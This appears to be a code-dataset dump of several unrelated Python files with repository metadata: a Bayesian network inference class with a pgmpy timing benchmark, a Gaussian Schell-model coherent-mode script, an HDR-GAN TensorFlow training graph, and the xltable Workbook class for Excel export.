def add_edge(self, ancestor: str, descendent: str, conditional_prob_matrix: t.List[t.List[float]]): # P(a|d)
if ancestor not in self.nodes:
raise Exception(f"Node with name '{ancestor}' doesn't exist yet")
if descendent not in self.nodes:
raise Exception(f"Node with name '{descendent}' doesn't exist yet")
if descendent in self.edges[ancestor]:
raise Exception(f"The edge ('{ancestor}','{descendent}') already exists")
cpd = ProbRelation(conditional_prob_matrix, (len(conditional_prob_matrix), len(conditional_prob_matrix[0])))
self.edges[ancestor][descendent] = cpd
def get_evidence(self, vars:t.Dict[str, int], target_var:str):
self.edges_inv = {}
for ancestor in self.edges:
for descendent in self.edges[ancestor]:
if descendent not in self.edges_inv:
self.edges_inv[descendent] = {}
self.edges_inv[descendent][ancestor] = self.edges[ancestor][descendent]
self.var_cache = dict(map(lambda var_key: (var_key, ValueVector([ float(i==vars[var_key]) for i in range(0, self.nodes[var_key].size())], index=vars[var_key])), vars.keys()))
probs = self._compute_var(target_var).probs
denom = np.sum(probs)
return (probs / denom).tolist()
def _calc_di(self, cpd:ProbRelation, ancestor_key, ancestor_distr:ValueVector, child_key)->ProbRelation:
if ancestor_distr.index != -1:
cpd_mx: np.ndarray = cpd.distibution[ancestor_distr.index].reshape(1, cpd.shape[1])
ancestor_vec: np.ndarray = np.array([self.nodes[ancestor_key].probs[ancestor_distr.index]])
ancestor_size = len(ancestor_vec)
else:
cpd_mx: np.ndarray = cpd.distibution
ancestor_vec: np.ndarray = self.nodes[ancestor_key].probs
ancestor_size = len(ancestor_vec)
child_vec: np.ndarray = self.nodes[child_key].probs
child_size = len(child_vec)
denom = cpd_mx * child_vec.reshape(1,child_size)
result = (ancestor_vec.reshape(ancestor_size, 1) / denom) - np.array([1.0])
return ProbRelation(result, result.shape)
def _mult_pair_di(self, d1:ProbRelation, d2:ProbRelation)->ProbRelation:
d1_splits = np.hsplit(d1.distibution, d1.shape[1])
d2_splits = np.hsplit(d2.distibution, d2.shape[1])
d_splits = [np.ndarray.reshape(d1_splits[k].reshape(d1.shape[0],1) * d2_splits[k].reshape(1, d2.shape[0]), (d1.shape[0] * d2.shape[0], 1)) for k in range(0, d1.shape[1])]
assembly = np.hstack(d_splits)
return ProbRelation(assembly, assembly.shape)
def _calc_a(self, child_key)->np.ndarray:
vec = self.nodes[child_key].probs
complement = np.array([1.0]) - vec
return complement / vec
def _compute_var(self, var:str)->ValueVector:
if var in self.var_cache:
return self.var_cache[var]
if var not in self.edges_inv:
return None
ancestor_vars = self.edges_inv[var]
kv_anc = map(lambda ancestor_key: (ancestor_key, self._compute_var(ancestor_key)), ancestor_vars)
kv_anc = list(filter(lambda tuple: tuple[1] is not None, kv_anc))
var_vec = self._compute_factor(var, *kv_anc)
probs = (var_vec.probs * self.nodes[var].probs)
self.var_cache[var] = ValueVector(probs)
return ValueVector(probs)
def __hash__(self):
return hash(repr(self))
@staticmethod
def _apply_cpd(v:ValueVector, cpd: ProbRelation):
if v.index != -1:
rel = cpd.distibution[v.index].reshape(1, cpd.distibution.shape[1])
return ProbRelation(rel, rel.shape)
else:
rel = v.probs.reshape(v.size(), 1) * cpd.distibution
return ProbRelation(rel, rel.shape)
@staticmethod
def _mult_pair_cpd(cpd1: ProbRelation, cpd2: ProbRelation)->ProbRelation:
if(cpd2 is None):
return cpd1
d1_splits = np.hsplit(cpd1.distibution, cpd1.shape[1])
d2_splits = np.hsplit(cpd2.distibution, cpd2.shape[1])
d_splits = [np.ndarray.reshape(d1_splits[k].reshape(cpd1.shape[0],1) * d2_splits[k].reshape(1, cpd2.shape[0]), (cpd1.shape[0] * cpd2.shape[0], 1)) for k in range(0, cpd1.shape[1])]
assembly = np.hstack(d_splits)
return ProbRelation(assembly, assembly.shape)
def _compute_factor(self, var_child, *var_ancestors)->ValueVector:
h = hash(tuple([var_child, var_ancestors]))
if h in self.factor_cache:
return self.factor_cache[h]
anc_dict = dict(var_ancestors)
anc_rels = list(map(lambda var_anc: self._apply_cpd(anc_dict[var_anc], self.edges[var_anc][var_child]), anc_dict))
len_rels = len(anc_rels)
while(len_rels > 1):
if len_rels % 2 == 1:
anc_rels.append(None)
len_rels = len_rels + 1
anc_rels = list(map(lambda i: self._mult_pair_cpd(anc_rels[i], anc_rels[i+1]), range(0, len_rels//2)))
len_rels = len(anc_rels)
dist = anc_rels[0].distibution
vec = dist.sum(axis=0)
res = ValueVector(vec)
self.factor_cache[h] = res
return res
def run_baytrino_model():
bnet = BayesianNet()
bnet.add_node('Y', [0.4, 0.3, 0.3])
bnet.add_node('X', [0.3, 0.4, 0.3])
bnet.add_node('A', [0.5, 0.5])
bnet.add_edge('X', 'A', [[0.2, 0.4], [0.55, 0.25], [0.25, 0.35]])
bnet.add_edge('Y', 'A', [[0.1, 0.7], [0.4, 0.2], [0.5, 0.1]])
pA = bnet.get_evidence({'X': 0, 'Y': 2}, 'A')
print(pA)
def test1_baytrino():
start_time = time.time()
bnet = BayesianNet()
bnet.add_node('A', [0.5, 0.5])
vals = {}
vals_ix = {}
for i in range(0, 100):
var = 'X' + str(i)
bnet.add_node(var, [0.3, 0.4, 0.3])
bnet.add_edge(var, 'A', [[0.2, 0.4], [0.55, 0.25], [0.25, 0.35]])
vals[var] = 0
vals_ix[i] = var
for i in range(0, 1000):
index = random.randrange(0,100)
if(vals[vals_ix[index]] == 1):
vals[vals_ix[index]] = 0
else:
vals[vals_ix[index]] = 1
bnet.get_evidence(vals, 'A')
end_time = time.time()
return end_time - start_time
def run_pgmpy_model():
edges = []
cdp_vars = []
cdp_a = TabularCPD('A', 2, [[0.5], [0.5]])
cdp_vars.append(cdp_a)
cdp_x = TabularCPD('X', 3, [[0.2, 0.4], [0.55, 0.25], [0.25, 0.35]], ['A'], [2])
cdp_vars.append(cdp_x)
edges.append(('A', 'X'))
cdp_y = TabularCPD('Y', 3, [[0.1, 0.7], [0.4, 0.2], [0.5, 0.1]], ['A'], [2])
cdp_vars.append(cdp_y)
edges.append(('A', 'Y'))
bmodel = BayesianModel(edges)
bmodel.add_cpds(*cdp_vars)
inf = VariableElimination(bmodel)
pA = inf.query(['A'], {'X': 0, 'Y': 2})
print(pA)
def test1_pgmpy():
start_time = time.time()
edges = []
cdp_vars = []
cdp_a = TabularCPD('A', 2, [[0.5], [0.5]])
cdp_vars.append(cdp_a)
vals = {}
for i in range(0,100):
var = 'X' + str(i)
cdp_x = TabularCPD(var, 3, [[0.2, 0.4], [0.55, 0.25], [0.25, 0.35]], ['A'], [2])
cdp_vars.append(cdp_x)
edges.append(('A', var))
vals[var] = 0
bmodel = BayesianModel(edges)
bmodel.add_cpds(*cdp_vars)
inf = VariableElimination(bmodel)
for i in range(0, 1000):
(inf.query(['A'], vals))
end_time = time.time()
return end_time - start_time
if __name__ == '__main__':
#print(f"test1 brazil, time elapsed '{test1_pgmpy()}'")
print(f"test1 baytrino, time elapsed '{test1_baytrino()}'")
| 33.84127 | 188 | 0.61128 | 1,239 | 8,528 | 4.039548 | 0.139629 | 0.026973 | 0.005395 | 0.010989 | 0.358042 | 0.270929 | 0.228571 | 0.2004 | 0.165834 | 0.151049 | 0 | 0.03794 | 0.239681 | 8,528 | 251 | 189 | 33.976096 | 0.733961 | 0.015361 | 0 | 0.297297 | 0 | 0 | 0.032358 | 0.003463 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086486 | false | 0 | 0.064865 | 0.005405 | 0.243243 | 0.016216 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2ad6223c7124029b0c85f3bdb142b833ded8b8e | 2,355 | py | Python | GSM/GSM_numeric.py | srio/paper-transfocators-resources | 917d8b4114056f62c84b295579e55bf5f0b56b6b | [
"MIT"
] | 1 | 2021-03-25T15:34:56.000Z | 2021-03-25T15:34:56.000Z | GSM/GSM_numeric.py | srio/paper-transfocators-resources | 917d8b4114056f62c84b295579e55bf5f0b56b6b | [
"MIT"
] | null | null | null | GSM/GSM_numeric.py | srio/paper-transfocators-resources | 917d8b4114056f62c84b295579e55bf5f0b56b6b | [
"MIT"
] | null | null | null | import numpy
from srxraylib.plot.gol import plot, plot_image, set_qt
set_qt()
def W(x1,x2):
delta_x = x2 - x1
mu = numpy.exp(-delta_x ** 2 / 2 / sigma_xi ** 2)
s1 = numpy.exp(-x1 ** 2 / 2 / sigma_x ** 2)
s2 = numpy.exp(-x2 ** 2 / 2 / sigma_x ** 2)
return mu * numpy.sqrt(s1) * numpy.sqrt(s2)
def get_coherent_fraction_exact(beta):
q = 1 + 0.5 * beta**2 + beta * numpy.sqrt( (beta/2)**2 + 1 )
q = 1.0 / q
CF = 1 - q
return CF
if __name__ == "__main__":
beta = 0.0922395 #1.151 #0.02 #
sigma_x = 3.03783e-05
sigma_xi = beta * sigma_x
x1 = numpy.linspace(-0.00012, 0.00012, 400)
# plot(x1, numpy.exp(-x1**2/(2*sigma_x**2)))
X1 = numpy.outer(x1, numpy.ones_like(x1))
X2 = numpy.outer(numpy.ones_like(x1), x1 )
cross_spectral_density = W(X1,X2)
indices = numpy.arange(x1.size)
plot(x1, W(x1,x1),
x1, cross_spectral_density[indices, indices],
x1, numpy.exp(-x1**2/2/sigma_x**2),
title="Spectral density", legend=["SD function", "SD array", "Gaussian with sigma_x"])
plot_image(cross_spectral_density, x1, x1)
#
# diagonalize the CSD
#
w, v = numpy.linalg.eig(cross_spectral_density)
print(w.shape, v.shape)
idx = w.argsort()[::-1] # large to small
eigenvalues = numpy.real(w[idx])
eigenvectors = -v[:, idx].T # minus sogn???
print(eigenvalues[0:10])
plot(numpy.arange(eigenvalues.size), eigenvalues)
print("CF=", eigenvalues[0] / eigenvalues.sum(), get_coherent_fraction_exact(beta))
from wofry.propagator.util.gaussian_schell_model import GaussianSchellModel1D, GaussianSchellModel2D
mode = 5
gsm = GaussianSchellModel1D(1.0, sigma_x, sigma_xi)
y1 = eigenvectors[mode, :]
y1 = y1 / numpy.sqrt((y1**2).sum() * (x1[1]-x1[0]))
y2 = gsm.phi(mode, x1)
print("modulus: ", (y2**2).sum() * (x1[1]-x1[0]))
plot(x1, y1 ,
x1, y2, legend=["numeric","theoretical"] )
#
# spectral density
#
sd = numpy.zeros_like(x1)
for i in range(sd.size):
sd[i] = cross_spectral_density[i,i]
sdmodes = numpy.zeros_like(x1, dtype=complex)
for i in range(sdmodes.size):
sdmodes += eigenvalues[i] * eigenvectors[i, :]**2
plot(x1, sd,
x1, sdmodes,
legend=["SD","SD from modes"],
title="Spectral density")
| 29.074074 | 104 | 0.603397 | 353 | 2,355 | 3.892351 | 0.303116 | 0.034935 | 0.025473 | 0.02329 | 0.141194 | 0.058952 | 0.044396 | 0.044396 | 0.030568 | 0 | 0 | 0.071863 | 0.231847 | 2,355 | 80 | 105 | 29.4375 | 0.687673 | 0.050955 | 0 | 0 | 0 | 0 | 0.05623 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036364 | false | 0 | 0.054545 | 0 | 0.127273 | 0.072727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2ad983fcf46426af99729be2b91a1990d21eb6e | 12,057 | py | Python | train_unetpps.py | nonu116/HDR-GAN | 239f68dd07f1970e0317515a313b69a9c3914f74 | [
"MIT"
] | 11 | 2021-07-11T11:33:50.000Z | 2022-03-28T15:32:54.000Z | train_unetpps.py | nonu116/HDR-GAN | 239f68dd07f1970e0317515a313b69a9c3914f74 | [
"MIT"
] | null | null | null | train_unetpps.py | nonu116/HDR-GAN | 239f68dd07f1970e0317515a313b69a9c3914f74 | [
"MIT"
] | null | null | null | import os
import tensorflow as tf
import data
import hdr_utils
import tensorkit as tk
from config import config
from loss import tf_ms_ssim_loss
from model.gan import PatchDiscriminator
from model.unetpps import UnetppGeneratorS
from tensorkit import hparam
from tensorkit.gan_loss import sphere as sphere_gan
from tensorkit.utils import get_time
from utils import l1_loss
UnetppGenerator, UnetGeneratorS = None, None
def make_log_dir():
if config.UNETPPS:
assert config.GENERATOR in ['', 'unetpps']
config.GENERATOR = 'unetpps'
tag = config.GENERATOR
if tag == '':
tag = 'unetpps'
p = '_'.join([get_time(), str(os.getpid()),
tag if config.UNETPPS else '',
config.safely_get('GAN', default=''),
'dpatchOri' if config.safely_get('PATCH_ORI', False) else '',
config.NORM,
'mu{}'.format(config.MU) if config.MU is not None and config.MU != 5000. else '',
'inHDR' if config.IN_HDR else '',
'oHDR' if config.OUT_HDR else '',
'lsTP' if not config.N_LOSS_TP else '',
'lsHDR' if config.LOSS_HDR else '',
'rp' if config.random_place else '',
config.safely_get('TAG', ''),
]).strip('_')
while '__' in p:
p = p.replace('__', '_')
log_dir = os.path.join(config.LOG_DIR, p)
return log_dir, tag
HPARAM_FILE = 'c{}.conf'.format(os.getpid())
def gradient_sum(loss, var, tag):
assert len(var) > 0
grad = tf.gradients(loss, var)
for g, v in zip(grad, var):
if g is not None:
tk.summary.histogram(g, '{}/{}'.format(tag, v.name))
def _graph(datas, model, discriminator, train, reuse, summary_feat, mu=None):
(ldr1, ldr2, ldr3), (ldr1r, ldr2r, ldr3r), (tp1, tp2, tp3), (tp1r, tp2r, tp3r), \
(hdr1, hdr2, hdr3), (hdr1r, hdr2r, hdr3r), hdr, _inp_exps, _ref_exps = datas
with tf.name_scope('inputs'):
if config.random_place:
random = tf.random_uniform([2], 0, 1.0, dtype=tf.float32)
ldr2, tp2, hdr2 = tf.cond(tf.less(random[0], 0.25),
lambda: tf.cond(tf.less(random[1], 0.3), lambda: (ldr1r, tp1r, hdr1r),
lambda: (ldr3r, tp3r, hdr3r)),
lambda: (ldr2, tp2, hdr2))
image1 = tf.concat([ldr1, hdr1 if config.IN_HDR else tp1], axis=-1)
image2 = tf.concat([ldr2, hdr2 if config.IN_HDR else tp2], axis=-1)
image3 = tf.concat([ldr3, hdr3 if config.IN_HDR else tp3], axis=-1)
gt_hdr = hdr
gt_tonemap = hdr_utils.tonemap(hdr, mu=mu)
outputs, features = model.graph(image1, image2, image3,
train=train, summary_feat=summary_feat, get_features=True, reuse=reuse)
if config.OUT_HDR:
out_hdrs = outputs
out_tps = [hdr_utils.tonemap(h, mu=mu) for h in out_hdrs]
else:
out_tps = outputs
out_hdrs = [hdr_utils.itonemap(tp, mu=mu) for tp in out_tps]
with tf.name_scope('gan_real'):
gan_real = tf.identity(gt_tonemap)
dis_real = discriminator.graph(gan_real, reuse=reuse) if discriminator is not None else None
dis_fakes = []
losses = dict()
sums = dict()
d_losses, g_losses = dict(), dict()
# ==================== alpha =======================
l1_hdr_alpha, d_alpha, g_alpha = None, None, None
with tf.variable_scope('alpha', reuse=tf.AUTO_REUSE):
if True or config.LOSS_HDR:
l1_hdr_alpha = hparam.get_hparamter('l1_hdr_alpha', initializer=1.)
hparam.set_sync(l1_hdr_alpha, 'L1_HDR_ALPHA', HPARAM_FILE)
sums['alpha/l1_hdr_alpha'] = l1_hdr_alpha
if discriminator is not None:
g_alpha = hparam.get_hparamter('g_alpha', initializer=1.)
d_alpha = hparam.get_hparamter('d_alpha', initializer=1.)
hparam.set_sync(g_alpha, 'G_ALPHA', HPARAM_FILE)
hparam.set_sync(d_alpha, 'D_ALPHA', HPARAM_FILE)
sums['alpha/g_alpha'] = g_alpha
sums['alpha/d_alpha'] = d_alpha
# ================== loss item =====================
for ind, (fake_hdr, fake_tp) in enumerate(zip(out_hdrs, out_tps)):
if not config.N_LOSS_TP:
losses['l1/{}'.format(ind)] = l1_loss(gt_tonemap, fake_tp)
else:
sums['l1/{}'.format(ind)] = l1_loss(gt_tonemap, fake_tp)
if config.LOSS_HDR:
losses['l1_hdr/{}'.format(ind)] = l1_loss(gt_hdr, fake_hdr) * l1_hdr_alpha
else:
sums['l1_hdr/{}'.format(ind)] = l1_loss(gt_hdr, fake_hdr) * l1_hdr_alpha
if config.MSSIM_L1:
sums['l1/{}'.format(ind)] = l1_loss(gt_tonemap, fake_tp)
sums['MSSIM/{}'.format(ind)] = tf_ms_ssim_loss(gt_tonemap, fake_tp)
_alpha = 0.84
losses['MSSIM_L1/{}'.format(ind)] = (1 - _alpha) * sums['l1/{}'.format(ind)] \
+ _alpha * sums['MSSIM/{}'.format(ind)]
if discriminator is not None:
gan_fake = fake_tp
if config.GAN == 'sphere':
dis_fake = discriminator.graph(gan_fake, reuse=True)
dis_fakes.append(dis_fake)
g_loss, d_loss, (distance_real, distance_fake, g_convergence_to_zero, d_convergence_to_min) = \
sphere_gan(dis_real, dis_fake, None, 3, reuse=ind != 0)
g_losses['g_loss/{}'.format(ind)] = g_loss
d_losses['d_loss/{}'.format(ind)] = d_loss
sums['sphere/distance_real/{}'.format(ind)] = distance_real
sums['sphere/distance_fake/{}'.format(ind)] = distance_fake
sums['sphere/g_convergence_to_zero/{}'.format(ind)] = g_convergence_to_zero
sums['sphere/d_convergence_to_min/{}'.format(ind)] = d_convergence_to_min
elif config.GAN == 'pgan':
dis_real = discriminator.graph(gan_real, reuse=reuse or ind != 0)
dis_fake = discriminator.graph(gan_fake, reuse=True)
distance = l1_loss(dis_real, dis_fake)
g_losses['g_loss/{}'.format(ind)] = distance
d_losses['d_loss/{}'.format(ind)] = -distance
sums['gan/g_loss/{}'.format(ind)] = distance
sums['gan/d_loss/{}'.format(ind)] = -distance
else:
raise RuntimeError('invalid gan: {}'.format(config.GAN))
# ================== loss total ====================
tk.logger.info('loss key: {}'.format(' '.join(losses.keys())))
_loss = loss = tf.add_n(list(losses.values()))
g_loss, d_loss = None, None
if discriminator is not None:
g_loss, d_loss = tf.add_n(list(g_losses.values())) * g_alpha, tf.add_n(list(d_losses.values())) * d_alpha
loss += g_loss
# ==================== summary =====================
assert all(k not in sums for k in losses.keys()), 'losses: {}\nsums:{}'.format(losses.keys(), sums.keys())
sums.update(losses)
for k, v in sums.items():
tk.summary.scalar(v, k)
with tf.name_scope('gradient_sum'):
outvars = model.variable_out()
# -------- gradient gan ---------
if discriminator is not None:
_outvars = discriminator.variable_out()
with tf.name_scope('gan'):
gradient_sum(g_loss, outvars, 'g_loss')
gradient_sum(_loss, outvars, 'ng_loss')
gradient_sum(d_loss, _outvars, 'd_loss')
# -------- gradient l1 ----------
_loss = [v for k, v in losses.items() if 'l1/' in k]
if not config.N_LOSS_TP:
with tf.name_scope('l1'):
assert len(_loss) in [0, 4, config.DEPTH - 1], _loss
if len(_loss) != 0:
_loss = tf.add_n(_loss)
gradient_sum(_loss, outvars, 'l1')
# -------- gradient l1_hdr ----------
if config.LOSS_HDR:
with tf.name_scope('l1_hdr'):
_loss = [v for k, v in losses.items() if 'l1_hdr/' in k]
assert len(_loss) in [0, 4, config.DEPTH - 1], _loss
if len(_loss) != 0:
_loss = tf.add_n(_loss)
gradient_sum(_loss, outvars, 'l1_hdr')
# -------- images ----------
if discriminator is not None:
with tf.name_scope('sum_sphere'):
gan_sum_real = tk.image.colorize(dis_real)
gan_sum_real = tf.concat([gan_sum_real for _ in dis_fakes], 2)
gan_sum_fake = tf.concat([i for i in dis_fakes], 2)
gan_sum_fake = tk.image.colorize(gan_sum_fake)
gan_sum_diff = tf.concat([tf.abs(i - dis_real) for i in dis_fakes], 2)
gan_sum_diff = tk.image.colorize(gan_sum_diff)
sum_im = tf.concat([gan_sum_real, gan_sum_fake, gan_sum_diff], axis=1)
tk.summary.images(sum_im, 3, 'sphere')
with tf.name_scope('summary'):
reals = tf.concat([tp1, tp2, tp3, gt_tonemap], axis=2)
fakes = out_tps + [tf.ones_like(out_tps[0]) for _ in range(4 - len(out_tps))]
fakes = tf.concat(fakes, axis=2)
sum_ims = tf.concat([reals, fakes], axis=1)
tk.summary.images(sum_ims, 3, 'reals_fakes')
return loss, d_loss
def graph():
if config.UNETPPS:
assert config.GENERATOR in ['', 'unetpps']
config.GENERATOR = 'unetpps'
if config.GENERATOR == 'unetpps':
model = UnetppGeneratorS(depth=config.DEPTH, norm=config.NORM)
elif config.GENERATOR == 'unets':
model = UnetGeneratorS(depth=config.DEPTH, norm=config.NORM)
elif config.GENERATOR in ['', 'unetpp']:
model = UnetppGenerator(depth=config.DEPTH, norm=config.NORM)
else:
raise NotImplementedError('generator: {}'.format(config.GENERATOR))
discriminator = PatchDiscriminator(ori=config.PATCH_ORI) if config.LOSS_GAN else None
train_data = data.get_train_data(mu=config.MU)
train_loss, d_loss = _graph(train_data, model, discriminator, train=True, reuse=None, summary_feat=True,
mu=config.MU)
val_loss = None
if config.VAL:
val_data = data.get_val_data()
with tf.name_scope('val'):
val_loss, _ = _graph(val_data, model, None, train=False, reuse=True, summary_feat=False, mu=None)
if config.LOSS_GAN:
return (train_loss, d_loss), (model, discriminator), val_loss
else:
return train_loss, model, val_loss
def args(parser):
parser.add_argument('--depth', dest='DEPTH', default=3, choices=(2, 3, 4, 5), type=int)
parser.add_argument('--norm', '-norm', help='normalization',
dest='NORM', default='sn', choices=['in', 'ln', 'nn', 'wn', 'sn'])
parser.add_argument('--loss_gan', dest='LOSS_GAN', default=False, action='store_true')
parser.add_argument('--gan', dest='GAN', default='sphere', choices=['sphere', 'wgan_gp', 'pgan'])
parser.add_argument('--loss_hdr', dest='LOSS_HDR', default=False, action='store_true')
parser.add_argument('--mssim_l1', dest='MSSIM_L1', default=False, action='store_true')
parser.add_argument('--train_hw', dest='train_hw', type=int, nargs=2, default=...)
parser.add_argument('--random_place', dest='random_place', default=False, action='store_true')
parser.add_argument('--patch_ori', dest='PATCH_ORI', default=False, action='store_true')
parser.add_argument('--mu', dest='MU', default=None, type=float)
parser.add_argument('--in_hdr', dest='IN_HDR', default=False, action='store_true')
parser.add_argument('--out_hdr', dest='OUT_HDR', default=False, action='store_true')
parser.add_argument('--n_loss_tp', dest='N_LOSS_TP', default=False, action='store_true')
parser.add_argument('--unetpps', dest='UNETPPS', default=False, action='store_true')
parser.add_argument('--gen', dest='GENERATOR', default='', choices=('unetpps', 'unetpp', 'unets', 'unet'))
return parser
| 47.845238 | 113 | 0.586962 | 1,606 | 12,057 | 4.174346 | 0.143836 | 0.026253 | 0.038037 | 0.020137 | 0.329654 | 0.256712 | 0.190036 | 0.186307 | 0.115901 | 0.075477 | 0 | 0.015429 | 0.25819 | 12,057 | 251 | 114 | 48.035857 | 0.734123 | 0.02737 | 0 | 0.142202 | 0 | 0 | 0.088411 | 0.009131 | 0 | 0 | 0 | 0 | 0.027523 | 1 | 0.022936 | false | 0 | 0.059633 | 0 | 0.105505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b0b61545531077cc783fddfbeaea17e72bd958 | 6,819 | py | Python | xltable/workbook.py | fkarb/xltable | 7a592642d27ad5ee90d2aa8c26338abaa9d84bea | [
"MIT"
] | 4 | 2017-03-09T20:04:35.000Z | 2020-01-18T16:24:33.000Z | xltable/workbook.py | fkarb/xltable | 7a592642d27ad5ee90d2aa8c26338abaa9d84bea | [
"MIT"
] | 6 | 2017-12-05T13:22:10.000Z | 2018-01-29T13:50:27.000Z | xltable/workbook.py | fkarb/xltable | 7a592642d27ad5ee90d2aa8c26338abaa9d84bea | [
"MIT"
] | 6 | 2017-10-26T16:44:27.000Z | 2021-08-16T19:39:21.000Z | """
Collection of worksheet instances
"""
import logging
_log = logging.getLogger(__name__)
class Workbook(object):
"""
A workbook is an ordered collection of worksheets.
Once all worksheets have been added the workbook can be written out or
the worksheets can be iterated over, and any expressions present in the
tables of the worksheets will be resolved to absolute worksheet/cell references.
:param str filename: Filename the workbook will be written to.
:param list worksheets: List of :py:class:`xltable.Worksheet` instances.
"""
def __init__(self, filename=None, worksheets=[]):
self.filename = filename
self.worksheets = list(worksheets)
self.calc_mode = "auto"
self.workbook_obj = None
# The active table and worksheet objects are set during export, and
# are used to resolve expressions where the table and/or sheet isn't
# set explicitly (in which case the current table is used implicitly).
self.active_table = None
self.active_worksheet = None
def add_sheet(self, worksheet):
"""
Adds a worksheet to the workbook.
"""
self.worksheets.append(worksheet)
# alias for add_sheet
append = add_sheet
def set_calc_mode(self, mode):
"""
Set the calculation mode for the Excel workbook
"""
self.calc_mode = mode
def itersheets(self):
"""
Iterates over the worksheets in the book, and sets the active
worksheet as the current one before yielding.
"""
for ws in self.worksheets:
# Expression with no explicit table specified will use None
# when calling get_table, which should return the current worksheet/table
prev_ws = self.active_worksheet
self.active_worksheet = ws
try:
yield ws
finally:
self.active_worksheet = prev_ws
def to_xlsx(self, **kwargs):
"""
Write workbook to a .xlsx file using xlsxwriter.
Return a xlsxwriter.workbook.Workbook.
:param kwargs: Extra arguments passed to the xlsxwriter.Workbook
constructor.
"""
from xlsxwriter.workbook import Workbook as _Workbook
self.workbook_obj = _Workbook(**kwargs)
self.workbook_obj.set_calc_mode(self.calc_mode)
for worksheet in self.itersheets():
worksheet.to_xlsx(workbook=self)
self.workbook_obj.filename = self.filename
if self.filename:
self.workbook_obj.close()
return self.workbook_obj
def to_excel(self, xl_app=None, resize_columns=True):
from win32com.client import Dispatch, gencache
if xl_app is None:
xl_app = Dispatch("Excel.Application")
xl_app = gencache.EnsureDispatch(xl_app)
# Add a new workbook with the correct number of sheets.
# We aren't allowed to create an empty one.
assert self.worksheets, "Can't export workbook with no worksheets"
sheets_in_new_workbook = xl_app.SheetsInNewWorkbook
try:
xl_app.SheetsInNewWorkbook = float(len(self.worksheets))
self.workbook_obj = xl_app.Workbooks.Add()
finally:
xl_app.SheetsInNewWorkbook = sheets_in_new_workbook
# Rename the worksheets, ensuring that there can never be two sheets with the same
# name due to the sheets default names conflicting with the new names.
sheet_names = {s.name for s in self.worksheets}
assert len(sheet_names) == len(self.worksheets), "Worksheets must have unique names"
for worksheet in self.workbook_obj.Sheets:
i = 1
original_name = worksheet.Name
while worksheet.Name in sheet_names:
worksheet.Name = "%s_%d" % (original_name, i)
i += 1
for worksheet, sheet in zip(self.workbook_obj.Sheets, self.worksheets):
worksheet.Name = sheet.name
# Export each sheet (have to use itersheets for this as it sets the
# current active sheet before yielding each one).
for worksheet, sheet in zip(self.workbook_obj.Sheets, self.itersheets()):
worksheet.Select()
sheet.to_excel(workbook=self,
worksheet=worksheet,
xl_app=xl_app,
rename=False,
resize_columns=resize_columns)
return self.workbook_obj
def get_last_sheet(self):
return self.workbook_obj.Sheets[self.workbook_obj.Sheets.Count]
def add_xlsx_worksheet(self, worksheet, name):
if worksheet not in self.worksheets:
self.append(worksheet)
return self.workbook_obj.add_worksheet(name)
def add_excel_worksheet(self, after=None):
if after is None:
after = self.get_last_sheet()
return self.workbook_obj.Sheets.Add(After=after)
def add_format(self, *args, **kwargs):
return self.workbook_obj.add_format(*args, **kwargs)
def get_table(self, name):
"""
Return a table, worksheet pair for the named table
"""
if name is None:
assert self.active_table, "Can't get table without name unless an active table is set"
name = self.active_table.name
if self.active_worksheet:
table = self.active_worksheet.get_table(name)
assert table is self.active_table, "Active table is not from the active sheet"
return table, self.active_worksheet
for ws in self.worksheets:
try:
table = ws.get_table(name)
if table is self.active_table:
return table, ws
except KeyError:
pass
raise RuntimeError("Active table not found in any sheet")
# if the tablename explicitly uses the sheetname find the right sheet
if "!" in name:
ws_name, table_name = map(lambda x: x.strip("'"), name.split("!", 1))
for ws in self.worksheets:
if ws.name == ws_name:
table = ws.get_table(table_name)
return table, ws
raise KeyError(name)
# otherwise look in the current table
if self.active_worksheet:
table = self.active_worksheet.get_table(name)
return table, self.active_worksheet
# or fallback to the first matching name in any table
for ws in self.worksheets:
try:
table = ws.get_table(name)
return table, ws
except KeyError:
pass
raise KeyError(name)
| 36.465241 | 98 | 0.614753 | 834 | 6,819 | 4.899281 | 0.238609 | 0.04699 | 0.058737 | 0.030837 | 0.16838 | 0.089574 | 0.089574 | 0.071953 | 0.071953 | 0.071953 | 0 | 0.001073 | 0.316615 | 6,819 | 186 | 99 | 36.66129 | 0.875751 | 0.252676 | 0 | 0.268519 | 0 | 0 | 0.048282 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 1 | 0.101852 | false | 0.018519 | 0.027778 | 0.018519 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b1d261933a20561fc0f58daeebaf0522d9162c | 795 | py | Python | src/hdmf/common/multi.py | kangdh/hdmf | 680b68a1bbc9377590862574daea83579a3d52bc | [
"BSD-3-Clause-LBNL"
] | 25 | 2019-03-07T15:33:16.000Z | 2022-02-16T20:03:57.000Z | src/hdmf/common/multi.py | kangdh/hdmf | 680b68a1bbc9377590862574daea83579a3d52bc | [
"BSD-3-Clause-LBNL"
] | 641 | 2019-02-02T00:31:12.000Z | 2022-03-31T18:16:54.000Z | src/hdmf/common/multi.py | kangdh/hdmf | 680b68a1bbc9377590862574daea83579a3d52bc | [
"BSD-3-Clause-LBNL"
